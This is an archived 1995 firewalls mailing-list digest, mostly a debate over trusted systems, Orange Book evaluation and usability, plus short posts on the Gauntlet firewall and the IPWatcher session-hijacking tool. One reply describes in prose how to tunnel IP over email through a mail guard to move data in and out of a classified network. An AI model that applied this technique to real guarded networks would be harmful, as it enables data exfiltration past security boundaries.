The point here is that the solutions need to match the problems. IF people who buy their computing solutions do it with that in mind (they don't!) it's not too bad - you buy an ordinary box for ordinary purposes and an CompaqLaunchPro for your H-bomb console and suit the engine to the task. Most people use pliers to drive nails, too; I know I've done it in the past. Where trusted systems get bad is when word comes from on high that all computing must be secure, and that everything needs to be as secure as the launch console and suddenly nobody can get their work done. At one customer site, we started engineering a firewall and they wanted to make *SURE* (in the sense of assurance) that Web-based virusses could not get in. Suddenly, all the solutions become complex, draconian, expensive -- and WORST OF ALL - you can't use the Netscape browser anymore. I submit to you that any computing system that is a general purpose one (not a dedicated launch console or whatever) that can't run Netscape is going to be a marketing disaster. > For instance, I find some comfort in strict security >engineering perspectives that demonstrate: > 1) That C level TCSEC security features can't keep different > classifications seperated - something else is necessary. > 2) *Someone* needs to look at designs / code / deployment / operations > and measure its ability to meet *some* standard. But, Ray, that's my *point* -- People have been saying this for *years*! The Association of Computer Security Greybeards have been talking about item #2 above for 10,12 years now and no real progress has been made. That's why it's been a complete rout out there. My take is that the ACSG have been too "hard core" and basically called for "if it's not perfect, don't do it" which caused the market to say, "ok." and go someplace else. Something is necessary, but I don't know what it is (actually I think I do but I'm keeping that idea for myself) and whatever it is, it's not what's currently out there. The problem with computers is that they're so absolute. In engineering, when you build a bridge, you figure out how strong the materials need to be, multiply by two or three, and away you go. There's nothing you can do like that in computing. The computer security analogy of "engineering overhead" would go something like: -> First, run C2 security -> Then, to be sure, shut off all processes except one -> Lastly, power it off There's just no way, with computers, to build in the invisible redundancy that you can in a bridge. Or maybe there is? *THAT* is my challenge to the ACSG: make the security an invisible part of the infrastructure, like an engineer can when building a house. > 1) Most trusted systems are very hard to use. However, I >believe that > this has more to do with the difficulty of the problems that > they address from a strict security engineering perspective. Yep. They *ARE* hard problems! For the readers of this list who are not steeped in orange, let me give an example. CMWs aren't able to really hit B2 because they don't enforce unique access to devices. Sounds like a small matter? Well, the problem is that the X display and its frame buffer are a nasty problem if you're trying to keep data from here from leaking to there. So, in orange land, you have to make the X server a "trusted" process that itself enforces unique access. Making the X server a trusted process means doing a security analysis (from a data leaking perspective) of X. This is a problem. Can you imagine the cost and effort? Can you imagine the impact on time to market? Yet the orange book dogma is that it must be done or you run no windows. Using a SPARC in console mode is not fun. Anyhow, I agree with Ray. They are hard problem. Sometimes, the manly thing to do is to say, "WOW! THAT IS A KILLER PROBLEM!" and bag it, try to think of another way to do it, or just give up entirely. That's what most of the world has done with secure computing. Microsoft has not been hurt by the fact that Windows has no security. I'm surprised they tout it in NT. They sure hide it where nobody will bother to use it, but at least they made it easy(er) to use. > 2) The only ones who use them are those who are forced (or force > themselves) to adhere to strict security engineering > perspectives. I can think of a number of really crude responses I'd love to make here. :) I know several people who like to be forced to do painful, humiliating, or just plain uncomfortable things. But even the masochists I know could't eroticize using a B2 system. >Bottom line is this "cheap, easy, everybody else is doing it" dynamic can >be shown to be flawed. I don't agree. I absolutely do not. The annals of industry are full of large companies that ignored the "cheap, easy, everybody else is doing it" and - they're either out of business or they're no longer large. >In my view, boiling the mess down to cold >reasoning reveals the inescapable conclusion that first order security >engineering principals are simply not being followed by most >security-realted efforts - including most contemporary internetworking >efforts. Yep. Fundamental principles can be hard to follow, though. Take one of my favorites: "buy low, sell high." Sometimes it's hard to implement. Sounds easy, doesn't it? Formal computer security is a lot like that. It's full of easy sounding stuff that is insanely hard to do. Covert channels? Great idea. You can spend a million bucks a year thinking about covert channels in your toaster oven and that's not even touching a network. > By some measures, the *real* absurdity is the notion that you can >simply connect two dispperate security perimiters together with cheap, easy >solutions and expect everything to be OK. But the alternatives are: 1) Doing nothing (which is proven to have problems) 2) Doing something formal and very complex (which is proven to take forever, cost a mint, and do something ridiculous like give you an Internet connection that only accepts incoming mail) That leaves "Do the best you can within cost constraints, time to market, and reasonable effort." >I ended up at >lunch with a table of developers from several major vendors that were all >working on building trusted X for their respective CMWs. Not thinking, I >made a remark about how easy it must be to grab MIT code and bash it into >shape. Spoons dropped into soup and there was laughter and choaking. >"Err, should I move to a different table?", I said. Naw, these folks just >pulled me up short. After regaining his composure, one guy told me that - >of course - this was their first idea. However, in reading the MIT code, >he found comments burried deep in an impossibly convoluted case statement >in X code that said "hey, I know this is ugly, but I'm a graduate student >and I don't have to care." True or not, it makes the point that building >something you can trust means starting from scratch. Givens in this >process seem to include everything you pointed out - and more! That's a true story. I suspect that millions of dollars have been spent to trying to security engineer X. The real answer is: "Under our guidelines, you really can't DO that." The orange book game seems to be all about trying to get around the orange book. It's this set of simple rules that are hard to implement (at A1 you have to have frictionless disk drives) (just kidding) that basically keep you from doing much of the stuff you want to do like being on a network, writing files, playing web. Trust engineering seems to be the process of saying, "ok, given these constraints, how can we still manage to do it?" The correct answer is: "give up, bag formal security, get an account on AOL" At least that's what a lot of people seem to do. A number of times I have talked to folks who really should not be on the 'net. I've listened to their firewall requirements, reviewed their designs, and recommended that they cancel the T1, and buy everyone at the facility an account on AOL, a modem at home, and an extended work policy that lets them spend an hour a day at home Internetworking. For some reason, this recommendation shocks people because I guess they think I'm supposed to sell firewalls. >Nothing against MIT (I don't >want to malign them in the least), but be it X or Kerberos - you can't even >expect public domain code to be supportable, let alone trustworthy - except >by the loosest of business and technical standards. Ray, Ray, Ray... You're lapsing into orange book think again!! Rewriting everything from scratch only works if you're Rob Pike. And it doesn't work if you need to use other people's products! Whenever I hear someone say the kind of thing you're saying in the paragraph above, I know I am talking with someone who has never had to put a product out under deadline, on 4 different platforms, next week, for customers who want to pay half what you're charging for it. I hate to break it to you, but a lot of commercial code is complete, unmitigated crap, too. You just don't get to see it because it's proprietary. Look at Windows internals and then look at 4.4BSDlite and it's like the difference between finger paintings and an painting by Meissonier. [I am implying that 4.4BSD is really nice stuff, and Windows is, well, a successful commercial product that is cheap, fast, easy.] >> At this point the trusted system mavens usually raise their >>hands and say, "Time to market isn't everything! I'd rather have >>security." The problem is that most of their users would rather have >>Windows 95, Photoshop, the latest version of MSword, BSD4.4, etc. > >Yes, indeed. I propose that this is the problem. While trusted system >mavens are not free from blame, the *real problem* is the notion that you >can actually run Windows 95, Photoshop, the latest version of MSword, >BSD4.4, etc without *some* disipline unless you don't care about security. Thank you for playing. Go tell your commercial customers to bag Windows and guess who they'll bag. It's not a question of not caring about security; it's a question of caring about getting the job done. With 99% of the world that takes top priority. Before you even think about security, make sure it helps get the job done BETTER than the way it's being done now, and if the answer is "it doesn't" then stick with the Government customers who have different success criteria. >>Look at the evaluated systems out there: they are all obsolete and >>you can hardly run anything interesting on them. So the mission critical >>systems get built on foundations of sand (no security) because the >>secure systems suck too much to contemplate using. Give most users >>a choice between CompuServe and DOCKMASTER and see which wins. > >Indeed. However, to heap all of the blame on DOCKMASTER and its ilk is not >fair. Its the foundations of sand that most organizations mission critical >systems stand on that is the problem! I'm not heaping blame. I'm just pointing out that DOCKMASTER is literally unusable when compared with, say, Compuserve. They both fulfill the same PURPOSE. If secure systems are going to win they have to be useable. I was just using DOCKMASTER as an example. That it has its adherents is expected. MULTICS was a commercial flop. >Yes - but, only from the perspective of those who insist on running mission >critical systems on foundations of sand! I think that a strict security >engineering-based evaluation of this reveals that *an answer* IS available >now. The real question is NOT if "the best answer" is available. "an answer" that is not "the best answer" is going to be a commercial failure. It may be "the right thing" in some people's eyes but all that means is that you'll have a line of mourners at your funeral. You keep dancing around it - say it outright. What you're hinting at is that everyone should run multilevel systems and that they should replace their installed base and applications base, eat the retraining cost, and use slow, crufty software that costs 3X what the other stuff costs. Is that what you're saying? If so, you need to have a MUCH stronger case that it'll help my business to *COMPETE* and achieve world marketplace domination. If you think that covert channel analysis was tough, try selling evaluated systems as a way of achieving a productivity edge. >> More trusted system philosophy: "if you don't use trusted >>systems you are clearly not concerned about security." That's nonsense. > >Ummm, how about if we soften this to say "if you don't use first order >security engineering principals, you are clearly not concerned about >security"? Noooo, how about let's tell the truth: "if you don't use first order security engineering principles it's probably because you had other work to do, that took a higher priority." I am *CONCERNED* about my roof developing a leak. I am not *DOING* anything about it. That doesn't mean I don't care, or that I am clueless about roofing, or that I am an evolutionary dead end. >[...] we >can pick and choose the pieces that we like and bend them into shape until >they DO get usable systems built. That's exactly what I see happening. The user community has flatly rejected evaluated systems. They picked the pieces they liked. I.e.: none. They're waiting until usable systems get built. In the meantime they have work to do. They WILL trade. >BTW, I'd sure love to hear the details about exactly how >your SMGs configureation to run TCP/IP over Email and do NFS works. Or, >was this a joke? It wasn't a joke. You simply encapsulate IP packets in uuencoded Email messages, manually create the label and mail it out. It's *slow* and the latency will kill you, but it will work. There's a tunnel driver for UNIX (Jeff Onions') that sets up a virtual network interface. All packets routing to the interface appear in /dev/tun0 for read. You simply read each packet at an application level, uuencode, and mail. On the other end, you reverse the process. It requires a collaborator. You *can* run TCP/IP over anything that supports the band width, even serial lines, DNS packets, Email... mjr. From firewalls-owner Wed Aug 2 01:30:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA19177 for firewalls-outgoing; Tue, 1 Aug 1995 23:39:57 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA11655 for ; Tue, 1 Aug 1995 12:36:48 -0700 Received: from mycroft.greatcircle.com(198.102.244.35) by miles via smap (V1.3) id sma011644; Tue Aug 1 12:36:32 1995 Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id MAA09617; Tue, 1 Aug 1995 12:30:57 -0700 Received: from skypoint.com(199.86.32.7) by mycroft via smap (V1.3mjr) id sma009610; Tue Aug 1 12:30:18 1995 Received: from [199.86.33.19] by skypoint.com with smtp (Smail3.1.28.1 #6) id m0sdMm9-0001ftC; Tue, 1 Aug 95 14:14 CDT X-Sender: ray@skypoint.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 1 Aug 1995 14:17:18 -0500 To: Marcus J Ranum From: kaplan@bpa.arizona.edu (Ray Kaplan) Subject: Re: Firewalls-Digest V4 #453 Cc: Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>The rigor of a >>trusted system design can (and is regularly) destroyed by misapplication, >>improper operation, and slip-shod management. This certainly includes >>firewalls based on this technology. Marcus J Ranum writes: > [I'm going to do an evil thing, here, and completely slide by >the rest of Ray's well-written and thought-out mail, because I think >that the paragraph above cuts directly to the heart of the matter. No problem - thanks. And, here I even flubbed the reply to the list by not attributing you (e.g., omitted "Marcus J Ranum writes" in my reply ;) Hey, were it not for the turns that discussions take, this might as well be a book, instead of a eh? The electronic publishing model that I'm birthing has this free flowing style at its core. Its also nice to hear that there still appears to be some sanity left amid my confusion ;) >I'm not picking on Ray here - but I'm going to use the paragraph above >to explain and illustrate why the multilevel security philosophy has >not, and never will, catch on, unless it's reformulated and remarketed.] > > The rigor of trusted system design is a market disaster and will >never succeed. When you talk to the trust engineers it's like talking to >a fredian psychologist. The logic isn't entirely circular, but if you've >bought into it, then it's inescapable. No argument there. However, I confess to confusion that is beyond this. The more security work I do, the less some of it makes sense. On one hand, there are people trying to solve hard problems. Many are mired in organizational politics, have no resources, and can't seem to even deal with the need for a security policy that is actually implemented and enforced. On the the other hand, the problems that they confront can't be solved with the simple technology that they are using. In the face of this, I've tried to balance the confusion that I feel by seeking out reasonable answers. For instance, I find some comfort in strict security engineering perspectives that demonstrate: 1) That C level TCSEC security features can't keep different classifications seperated - something else is necessary. 2) *Someone* needs to look at designs / code / deployment / operations and measure its ability to meet *some* standard. While there are other security engineering ideas that I find interesting, these illustrate why trusted system ideas are "comfort food" amid my confusion. Were it not for the fact that I seem to keep coming back to them in the harsh light of retrospect, I'd just keep them on the shelf along with the other cold / flu / "need a boost" remedies. > The view Ray presents above: "trusted systems are great, but are >just not being used right" is, in my view, a complete cop-out. The reason >trusted systems are not being used right is because the way they are >written they are UNUSABLE. Only someone who is forced to use them would >even consider touching them! In general, I agree. Only two points: 1) Most trusted systems are very hard to use. However, I believe that this has more to do with the difficulty of the problems that they address from a strict security engineering perspective. 2) The only ones who use them are those who are forced (or force themselves) to adhere to strict security engineering perspectives. >How has this happened? Well, it's a number of things: > 1) Technology moves too fast for formal, dogmatic paradigms > 2) Market-driven forces will not wait for formal methods > 3) Time to market is everything - vendors throw everything > overboard (especially security!) to get it out the > door on time Absloutely no argument there. However, I hasten to add that the drivers for your list of causes are all based on a more fundamental dynamic: organizations seem hell bent on going down paths that seem - at first blush - to be the easiest, cheapest... Perhaps only because everyone else is doing it, perhaps only because its the only apparent way to do things. Bottom line is this "cheap, easy, everybody else is doing it" dynamic can be shown to be flawed. While this idea may be better discussed in a forum like Risks, I believe that there is something practical for firewallers (and other security types) here. In my view, boiling the mess down to cold reasoning reveals the inescapable conclusion that first order security engineering principals are simply not being followed by most security-realted efforts - including most contemporary internetworking efforts. By some measures, the *real* absurdity is the notion that you can simply connect two dispperate security perimiters together with cheap, easy solutions and expect everything to be OK. > What's happened is that in order to meet the insanely complex >design criteria of trusted systems, vendors have to design systems that >are obsolete before they even go into evaluation. For example, by the >time a vendor has rewritten their X server for CMW, it's 2 revs out >of date, obsolete, buggy, and lacking support for the latest device >drivers. In a technological market like the one we're in, if your >product cycle is greater than 8 months-to-market you are TOAST. Absolutely. However, here is a story that illustrates the more basic problem with all of this. A few years ago I was at one of those "sort of public" security conferences that recently opened its previously classified sessions to the likes of me - you know, places where most attendees share the kinship of clearences and obscure security-realted work. I ended up at lunch with a table of developers from several major vendors that were all working on building trusted X for their respective CMWs. Not thinking, I made a remark about how easy it must be to grab MIT code and bash it into shape. Spoons dropped into soup and there was laughter and choaking. "Err, should I move to a different table?", I said. Naw, these folks just pulled me up short. After regaining his composure, one guy told me that - of course - this was their first idea. However, in reading the MIT code, he found comments burried deep in an impossibly convoluted case statement in X code that said "hey, I know this is ugly, but I'm a graduate student and I don't have to care." True or not, it makes the point that building something you can trust means starting from scratch. Givens in this process seem to include everything you pointed out - and more! I just left CyberSAFE (dominate supplier of commercial Kerberos.) After two years of absolute insanity and pain, they actually have a brand new, spanking clean code base that plays with the world while giving them a shot at actually building things on top of it. Nothing against MIT (I don't want to malign them in the least), but be it X or Kerberos - you can't even expect public domain code to be supportable, let alone trustworthy - except by the loosest of business and technical standards. > At this point the trusted system mavens usually raise their >hands and say, "Time to market isn't everything! I'd rather have >security." The problem is that most of their users would rather have >Windows 95, Photoshop, the latest version of MSword, BSD4.4, etc. Yes, indeed. I propose that this is the problem. While trusted system mavens are not free from blame, the *real problem* is the notion that you can actually run Windows 95, Photoshop, the latest version of MSword, BSD4.4, etc without *some* disipline unless you don't care about security. All by itself, object linking and embedding is enough to curl my hair - internetworked or not. >Look at the evaluated systems out there: they are all obsolete and >you can hardly run anything interesting on them. So the mission critical >systems get built on foundations of sand (no security) because the >secure systems suck too much to contemplate using. Give most users >a choice between CompuServe and DOCKMASTER and see which wins. Indeed. However, to heap all of the blame on DOCKMASTER and its ilk is not fair. Its the foundations of sand that most organizations mission critical systems stand on that is the problem! > The reason trusted systems are mis-deployed is because they >are terrible for real world use. > > Trusted system guys have to stop telling the people who are >trying to get real work done "nononono! you're using it WRONG!" and >should spend thier time trying to make trusted systems that are easy >to use, with the security features completely hidden from the user. Amen! If you run for office, I'll vote for you! Fact of the matter is that if we are ever to have technology that we can trust, we'll have to build in security from the get go. At the risk of setting off a debate about crypto, I hasten to point out that we might never see this given the politics of secrets ;) > But don't bother - it's too late. The installed base of >insecure systems and practices is too large to be replaced and >the demon of backwards compatibility rides all our backs. There >might have been a time when secure computing could have become >the norm but now it's too little, too late. I've had the pleasure >of addressing the Association Of Computer Security Greybeards and >when I've said this sort of thing their reaction is one of horror. >"Trustworthy computing is almost a reality! Don't throw the baby >out with the bathwater!" -- the sad fact is that it's been 10 years >of effort and all that's come of it is obsolete software that is >5 years behind the market curve. The baby never even got close >to the bath. Yes - but, only from the perspective of those who insist on running mission critical systems on foundations of sand! I think that a strict security engineering-based evaluation of this reveals that *an answer* IS available now. The real question is NOT if "the best answer" is available. Given the politics of defense spending, I'm glad that CMW got out and deployed so we could see its problems BEFORE things got ugly for those who built businesses based on their belief that foundations of sand needed to give way to sound security engineering. >>The only thing I'd add is that the "make them be treated differently" be >>stiffened to something like "proveably force them to be treated according >>to the security policy." > > Nope. Forget proofs. Come on. The proof guys have been >ploughing that field for years and have come up empty. The reality >is that proofs don't scale well with complexity, and in case you >haven't noticed, every release of every program is 10% larger and >more complex than the previous. The proofnicks have had their turn >and it's been a dead loss. Yep, but I think I may have mislead you. The only "proofs" that I require when I do a security assessment is that the security policy is actually implemented in a way that actually supports the business goals that are supposed to underpin the thing in the first place! I'm not a math or crypto or trusted system or defense guy. I'm only asking how a given mix of security features meets the problems that it was deployed to solve. I know, most security status quos are defacto conditions and I freely admit my pureist perspective. Its this tension that makes me want to go get a job mowing lawns rather than continue my security career ;) The local McDonalds even has some openings ;) Or, maybe the universe is just playing a joke on me: there ain't ever gonna be no real security. 'course, this might ensure my income for a while ;) >>>Why aren't more people doing >>>this? Because of compatibility and installed base and support >>>issues. I've seen grown men start to cry when they even THINK about >>>running a labelled network... >>Indeed. However, those who are serious about this do it - painful as it >>is. Yoda (Star Wars Jedi Master) was right: "There is only do or not do, >>there is no try." > > More trusted system philosophy: "if you don't use trusted >systems you are clearly not concerned about security." That's nonsense. Ummm, how about if we soften this to say "if you don't use first order security engineering principals, you are clearly not concerned about security"? The fact that many think that the only apparenmt contemporary examples of security engineering principals are found in broken down evaluation systems is a consideration. I *do* know of vast internetworked systems that meet their security policy without a shread of evaluation - save the security engineering principals that were used to design / deploy / manage them. > Only people with a lot of money and a lot of time can afford to >bother and they usually do their important computing (where the work >REALLY gets done!) on PCs at home! Sometimes trusted system think >reminds me of those guys who'd rather ride a Harley Davidson hardtail >than anything else in the world. "Sure it's slow, corners like a hippo, >brakes like a banana on a greased cookie tray, drips oil, and sounds >like a trainwreck - BUT IT'S A HARLEY" -- "Sure, it's Version 6 UNIX >with no TCP/IP and no windows and it's slower than mud and I can >only run it on hardware that is slower than my toaster oven's clock >chip but it's A1!" Or, more to the point for me: I love my own 1961 double door microbus. I know it well, I can fix it when it breaks, I know its limitations, and I know just how far I can trust it. When I need something different, I'll go get it (e.g.,a big, nasty, 4 wheel drive, five ton truck with a blade for plowing the driveway after a blizzard.) Like waiting for the city to plough the street, one could wait to improve the security of access to outside networks. However, like I'd abandon my microbus for a nasty five ton (that may not even have a heater) to make a path until the pros from city snow removal arrive - I gotta do *something* to open and maintain a trustworthy path to external networks. This has to be done - even in the face of the fact that the five ton is to cumbersome to do a good driveway job in all but the simplist cases. As the driveway is a mess (even after I hack at it with the 5 ton and its blade), a private network will still be a mess by some standards after its internetworked. Hey, that Harley is a mess. But, sure beats the hell out of sitting on the side of the road waiting for a more perfect ride to happen by. *Given the choice*, I'll pick the Harley for lots of reasons - despite the fact that its an old, ugly pile. > I've been working with a lot of people lately and I haven't >actually run into anyone in the commercial space IN MY ENTIRE CAREER >who has been actually deploying trusted system technology. Perhaps >you have, but from my viewpoint it looks like a total rout. > > It's not that people are not serious about trusted systems, >it's that trusted system designers aren't serious about producing >useable systems. [Actually, they are, they just haven't succeeded] Yep, good point. I'd only point out that in the wake of their efforts we can pick and choose the pieces that we like and bend them into shape until they DO get usable systems built. >> 1) The attempt to invent a new evaluation criteria (in the form of >> a remake of the U.S. Trusted Computer System Evaluation Criteria >> (TCSEC) into The Federal Criteria) seems to have failed - the Orange >> book looks like the status quo for a while. > > Yep. The attempt appears (from here) to have been to write >an envelope criteria that could be stretched to cover ANYTHING so that >way people could actually get what they want to use in the door. It >failed but I think it was mostly because the documentation was so >big and arcane that nobody except the authors had time to read it all. :( As it seems with most serious efforts to codify basic principals in a way that accomidates everyone, eh? In my view, the only hope is that we can simplify everything back to first order security engineering principals that *can* actually be deployed. >> 2) It looks like the attempt to have a nice compromise in the form >> of the mix of security features found in the Compartmented Mode >> Workstation (CMW) has fallen into disfavor. > > That was an interesting effort. From where I stand, the CMW >effort was an internal revolution against trusted systems, playing >within the rules. If you look at some of the things in CMWs they >were anathema to the hardcore trust engineers. My take on it was that >the users were Sick and Tired of having workstations with no windows. >CMW seems to have been an elaborate maskirovka to get NFS and X-windows >into DOD computing. > > I suspect it's failed because of time to market. Even the vendors >have got to hate having to maintain stuff that's 2 revs out of date >because of the evaluation. Yep. And, as a reault of it, we now have some interesting experience to build on - not all of which has been very nice. >>Smail is great. However, if >>you are REALLY going to wall off mail, it takes trusted technology that >>actually implements a security policy to control the upgrade/down grade >>issues between compartments/levels. > > The SMG (if that's what you're referring to) is a case in >point. Give me one of the current SMGs and I can configure it to >run TCP/IP over Email, and do NFS into and out of a classified >environment. I believe this little loophole is being fixed but the >whole problem is one of those "emperors new clothes" type deals. >If you allow ANY large amounts of data in or out, I can run IP >over it. Period. All you can do is make it slow and expensive. The >long and short of the story is that it's a wasted effort. If the >data needs to be absolutely secure: isolate it. Or, use IP pipes that can actually enforce the security of the two security perimiters that are being connected. Some of the RFC 1108 stuff seems to be as viable as vendor offering that put DES in their IP kernels for packets. The trick is that ALL of the channels that connect a security perimiter with another of its ilk must do it in a way that does not break their respective security policy. >>I propose that this is because the "99% of the things that >>people want to do" are not given due consideration in the light of a >>rigerous risk analysis. > > Of course not! It's usually considered in terms of time to >market and productivity gains. > >> As examples, consider that object linking and MIME >>are wonderful new things that everyone wants to do. However, the lack of >>security in the current designs that are seeing widespread implementation >>is profound. That is, no one stopped to do a risk analysis. Had they done >>so, I believe that the rigor of using a trusted system to enforce a >>security policy that was targeted at reducing these risks would have become >>common place by now. > > Hell no! > > Run trusted systems just so I could do MIME? No WAY! I'll >just do MIME and bash some stuff into the interpreter to make it a >little better and ride the tiger. That's what 99% of the people out >there will do. Indeed, this is the classic approach that I know. However, I'm not saying put an A level system up to deal with MIME. I'm saying that some trusted technology can be used to keep the MIME that is coming from untrusted sources off systems that can't defend themselves. I propose that the way you do this is to use your approach in conjunction with an isolation mechanism that seperates trusted Email from that which is suspect. For instance, the internal network's critical partitions are walled off by mandadory controls that only allow them to interoperate with others of thier ilk. I can see a departmental PC that is reserved to such a partition in the face of the realization that a process engineer's PC that is outside of that partition will never cut it since they are downloading freeware drivers. BTW, I'd sure love to hear the details about exactly how your SMGs configureation to run TCP/IP over Email and do NFS works. Or, was this a joke? > Rigor is nice but every time rigor gets put up against >technological progress, it loses. :( > > I'm not saying to trash rigor, but if you're going to be >doing in-depth risk analysis all the time, you're going to have >to make it fast or you'll get left behind. I've seen too many cases >where an organization has been thinking real hard about a firewall >and found out that while they were thinking the guys in the research >lab put in a T1 line. :( Yep. The cure is for the bosses to say three things: 1) Hey, guys - listen up. This new lab now holds our golden eggs. *All* traffic in and out of it will subscribe to the following rules (bla, bla, bla...) 2) Here is some money, a body, and my franchise for you to pay attention 3) I'll be back from time to time to check how well my rules are being followed. If I catch one (or all) of you messing around with the rules, I'll own your first born male child In my experience, this is really ugly, expensive, and hard - and, it takes the disipline of hard-headed security engineering to make it work. Hang evaluations except for the parts that are needed: the ability to *actually* force certain traffic to be seperated from certain other traffic. A B level system as part of an isolation mechanism to solve this problem - yes. A B level system for all of the isolation mechanism - no. Fact of the matter is that I usually only see this happen *after* the organization has had the hell scared out of it by an incident. Sadly, when it happens its usually devestating. I've as many fear grenades as any security consultant. However, I prefer to get back to first order security engineering principals and ignore the ugly mess that surrounds trying to make everything on a private network flow through a convoluted evaluated mess that is impossible to use. Slice off a chunk of the work that has been done in trusted systems, trim off the bad parts, and use the rest in the narrow scope of a well defined problem. I've a friend who travels the world's back woods widely on a shoe string. Rather than starve since he can't stomach the meat in open markets that is half rotten, he takes his sharp knife and trims off the bad parts and lives on a reduced level of sustanance. Most times, the piece of meat with rotten edges is the only alternative to having nothing to eat. Why don't we see anyone allowing their firewall builders to slice off a little chunk 'o B level to interconnect their mission critical applications? RayK 8) - Better Living Through Authentication - I usually only speak for myself Ray Kaplan - Security Services - P.O. Box 23210 - Richfield, MN 55423 Phone / FAX (612) 861-7198 - currently: kaplan@bpa.arizona.edu But, as with everything else in life, this will change. From firewalls-owner Wed Aug 2 02:00:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA23414 for firewalls-outgoing; Wed, 2 Aug 1995 00:57:19 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA23400 for ; Wed, 2 Aug 1995 00:57:17 -0700 From: puseya@allenovery.com Received: from gatekeeper.allenovery.com(194.129.43.85) by miles via smap (V1.3) id sma023394; Wed Aug 2 00:57:07 1995 Received: by gatekeeper.allenovery.com; id AA06726; Wed, 2 Aug 95 07:58:10 GMT Received: from unknown(193.36.241.84) by gatekeeper.allenovery.com via smap (V1.3) id sma006722; Wed Aug 2 07:57:47 1995 Received: from cc:Mail by ccmgate.allenovery.com id AA807378966; Wed, 02 Aug 95 08:23:43 GMT Date: Wed, 02 Aug 95 08:23:43 GMT Message-Id: <9507028073.AA807378966@ccmgate.allenovery.com> To: firewalls@greatcircle.com Subject: Which Firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At the moment we are considering the Gauntlet firewall system on a Sun Sparcstation as our firewall. Can anybody tell me if there are any integrity problems with this firewall or any other reasons why we should not consider it. Many Thanks. Andy Pusey From firewalls-owner Wed Aug 2 02:32:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA27401 for firewalls-outgoing; Wed, 2 Aug 1995 02:25:37 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA27371 for ; Wed, 2 Aug 1995 02:24:41 -0700 From: bmanning@ISI.EDU Received: from venera.isi.edu(128.9.0.32) by miles via smap (V1.3) id sma027364; Wed Aug 2 02:24:22 1995 Received: from zed.isi.edu by venera.isi.edu (5.65c/5.61+local-22) id ; Wed, 2 Aug 1995 02:23:16 -0700 Posted-Date: Wed, 2 Aug 1995 02:20:33 -0700 (PDT) Message-Id: <199508020920.AA29400@zed.isi.edu> Received: by zed.isi.edu (5.65c/4.0.3-4) id ; Wed, 2 Aug 1995 02:20:34 -0700 Subject: Re: IPWatcher To: Cameron_A_P@ceo.sbic.co.za Date: Wed, 2 Aug 1995 02:20:33 -0700 (PDT) Cc: firewalls@greatcircle.com In-Reply-To: <9508021235.AA00151@zork.sbic.co.za> from "Cameron_A_P@ceo.sbic.co.za" at Aug 2, 95 08:35:03 am X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 641 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Message: > I have come accross a package on Internet Called IPWatcher. This > package renders Firewalls and Smart Cards Useless in that it allows > the person using it to Hijack and take over an established connection. > > The URL to get more Info on this package is > http://nad.infostructure.com/watcher.html > > My Question and problem is how do you prevent this from happening. > Also are there other Hacker tools that can do this. There are a number of other facilities to hijack sessions. The only way around it is end2end encryption. Then, although a session can be hijacked, it is crypted and therfore useless. --bill From firewalls-owner Wed Aug 2 05:00:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA02228 for firewalls-outgoing; Wed, 2 Aug 1995 04:54:30 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA02220 for ; Wed, 2 Aug 1995 04:54:28 -0700 Message-Id: <199508021154.EAA02220@miles.greatcircle.com> Received: from cheops.anu.edu.au(150.203.76.24) by miles via smap (V1.3) id sma002209; Wed Aug 2 04:54:16 1995 Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA105994192; Wed, 2 Aug 1995 21:49:52 +1000 From: Darren Reed Subject: Re: IPWatcher To: bmanning@ISI.EDU Date: Wed, 2 Aug 1995 21:49:51 +1000 (EST) Cc: Cameron_A_P@ceo.sbic.co.za, firewalls@greatcircle.com In-Reply-To: <199508020920.AA29400@zed.isi.edu> from "bmanning@ISI.EDU" at Aug 2, 95 02:20:33 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1319 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from bmanning@ISI.EDU, sie said: > > > > > Message: > > I have come accross a package on Internet Called IPWatcher. This > > package renders Firewalls and Smart Cards Useless in that it allows > > the person using it to Hijack and take over an established connection. > > > > The URL to get more Info on this package is > > http://nad.infostructure.com/watcher.html > > > > My Question and problem is how do you prevent this from happening. > > Also are there other Hacker tools that can do this. IP watcher is nice and fine but it assumes you're going to be there 24hours a day to catch the cracker that comes knocking at 2am. I'd prefer to be asleep with some knowledge that my network was safe than be thinking on whether or not I should be there watching, waiting...I'm more concerned that businesses will buy these and turn them inwards...(for better or worse). Seems like a nice tool for CERT like people who want to watch things going on - it won't make a network more secure. > There are a number of other facilities to hijack sessions. > The only way around it is end2end encryption. Then, although > a session can be hijacked, it is crypted and therfore useless. Can't wait for crackers to start using encryption, can you ? And yes, I've known them to use deslogin, etc... darren From firewalls-owner Wed Aug 2 05:27:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA02103 for firewalls-outgoing; Wed, 2 Aug 1995 04:40:30 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA02095 for ; Wed, 2 Aug 1995 04:40:28 -0700 Received: from relay3.uu.net(192.48.96.8) by miles via smap (V1.3) id sma002089; Wed Aug 2 04:39:45 1995 Received: from rssi by relay3.UU.NET with SMTP id QQzbas22198; Wed, 2 Aug 1995 07:38:29 -0400 Received: from pail.rssi.com by rssi (4.1/SMI-4.1) id AA29943; Wed, 2 Aug 95 07:40:46 EDT Received: by pail.rssi.com (5.0/SMI-SVR4) id 